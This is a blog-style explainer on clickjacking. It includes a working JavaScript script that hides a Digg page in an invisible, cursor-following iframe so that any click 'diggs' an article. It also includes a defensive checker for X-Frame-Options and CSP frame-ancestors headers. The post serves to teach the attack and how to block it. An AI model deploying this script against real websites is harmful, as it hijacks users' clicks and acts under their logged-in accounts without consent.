Clickjacking Demo for Digg

If you don’t fully understand how clickjacking works, you certainly are not alone. Clickjacking is not that hard for people with Web development experience to implement; laymen, however, have no reason to know what terms such as “UI redressing” and “iframe” mean.

There are plenty of clickjacking demonstrations online that show the fundamentals of how clickjacking works. The demo below focuses on a clickjacked page that diggs an article: an invisible iframe containing the Digg page is laid over the decoy content and repositioned so that it follows the mouse cursor, keeping the Digg button directly under the pointer. That is a dynamic way for cybercriminals to trick Internet users. No matter where you click on that page, the click lands inside the hidden frame and triggers the cross-site clickjack.
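As an added illustration (not code from the original post or from the Digg demo itself), here is how such a cursor-following invisible frame is typically built: a transparent iframe pointed at the target page, stacked above the decoy content, and moved on every mousemove so that the hidden button stays under the pointer. The target URL and the button’s coordinates inside the frame are assumed values, not Digg’s real layout.

```javascript
// Added example, not from the original post. The URL and the button
// coordinates are hypothetical; Digg's real page layout is not on the page.
const TARGET = {
  url: 'https://digg.com/example-article', // assumed target page
  buttonX: 120, // hypothetical: centre of the "digg it" button, in CSS px
  buttonY: 40,  // from the framed page's top-left corner
};

// Pure function: given the pointer position in the attacker's page, return
// the CSS left/top at which to place the iframe so that the hidden button is
// centred under the pointer. Kept free of DOM calls so it can be checked
// outside a browser.
function framePositionForPointer(pointerX, pointerY, button = TARGET) {
  return { left: pointerX - button.buttonX, top: pointerY - button.buttonY };
}

// Build the invisible iframe: fully transparent but still receiving clicks,
// stacked above everything else, and large enough that the page is not clipped.
function buildInvisibleFrame(doc, target = TARGET) {
  const frame = doc.createElement('iframe');
  frame.src = target.url;
  Object.assign(frame.style, {
    position: 'fixed',
    opacity: '0',          // invisible, yet clicks still reach it
    border: '0',
    width: '800px',
    height: '600px',
    zIndex: '2147483647',  // above the decoy content
    pointerEvents: 'auto',
  });
  return frame;
}

// Wire it up: every mouse move re-positions the frame so the hidden button
// tracks the cursor; wherever the victim clicks, the click lands on it.
function install(doc) {
  const frame = buildInvisibleFrame(doc);
  doc.body.appendChild(frame);
  doc.addEventListener('mousemove', (ev) => {
    const pos = framePositionForPointer(ev.clientX, ev.clientY);
    frame.style.left = pos.left + 'px';
    frame.style.top = pos.top + 'px';
  });
  return frame;
}

// Only attach to a page when a DOM actually exists (i.e. in a browser).
if (typeof document !== 'undefined') {
  install(document);
}
```

The click that reaches the framed site carries the victim’s own Digg cookies, which is why the digg counts as the victim’s own action; nothing on the decoy page needs to be trusted for that to work.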

Obviously, no one would fall for this example as shown. It is intended as a demonstration, not as a real clickjacking attack. It is easy to see, however, how someone could turn this example into a real attack that draws in thousands and thousands of hits.

It is also easy to see that clickjacking has applications outside of Digg. You could create clickjacked pages that do just about anything: some purchase items on Amazon.com; others trick you into clicking something that releases scripts to spy on your activities. This is particularly dangerous because attackers can use the information you send over the Internet to steal your identity or commit credit card fraud. Falling for a little trick like this on a website could have long-lasting consequences that ruin your credit and siphon money out of your bank accounts.
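Whether a page can be abused this way depends on whether it lets other origins frame it at all. The following check, added here and not part of the original post, decides from a response’s X-Frame-Options and Content-Security-Policy frame-ancestors headers whether a given attacker origin may embed the page; the header sets and origins are constructed samples.

```javascript
// Added example, not from the original post. Sample headers are constructed.

// Pull the frame-ancestors source list out of a Content-Security-Policy value.
// Returns null when the directive is absent.
function frameAncestors(cspValue) {
  if (!cspValue) return null;
  for (const directive of cspValue.split(';')) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0].toLowerCase() === 'frame-ancestors') return parts.slice(1);
  }
  return null;
}

// Does one CSP source expression (e.g. 'self', https:, https://*.x.example)
// match the framing origin?
function sourceMatches(source, framerOrigin, pageOrigin) {
  const s = source.replace(/^'|'$/g, '').toLowerCase();
  if (s === 'none') return false;
  if (s === 'self') return framerOrigin === pageOrigin;
  if (s === '*') return true;
  const f = new URL(framerOrigin);
  // scheme-only source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return f.protocol === s;
  // host source, optionally with scheme, "*." wildcard and port
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && f.protocol !== scheme + ':') return false;
  if (wildcard) {
    if (!f.hostname.endsWith('.' + host)) return false;
  } else if (f.hostname !== host) {
    return false;
  }
  if (port && port !== '*') {
    const framerPort = f.port || (f.protocol === 'https:' ? '443' : '80');
    if (framerPort !== port) return false;
  }
  return true;
}

// Decide whether framerOrigin may embed a page served from pageOrigin with the
// given response headers. frame-ancestors, when present, takes precedence over
// X-Frame-Options, as it does in browsers that support both.
function framingAllowed(headers, pageOrigin, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const ancestors = frameAncestors(h['content-security-policy']);
  if (ancestors !== null) {
    return ancestors.some((src) => sourceMatches(src, framerOrigin, pageOrigin));
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === pageOrigin;
  // No header, or the obsolete ALLOW-FROM form that current browsers ignore:
  // any site may frame the page, which is the condition the demo relies on.
  return true;
}

// Constructed sample header sets, not captured from any real site.
const SAMPLES = {
  unprotected: {},
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  cspSelf: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'" },
  cspPartner: { 'Content-Security-Policy': 'frame-ancestors https://*.partner.example' },
};
```

A missing header, as in the unprotected sample, is exactly the state a clickjacking page needs. Serving `X-Frame-Options: DENY` or `Content-Security-Policy: frame-ancestors 'none'` on any page with a state-changing button closes this off regardless of how cleverly the frame is positioned.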

Here’s the demo video that will help you understand how this basic attack works:

 
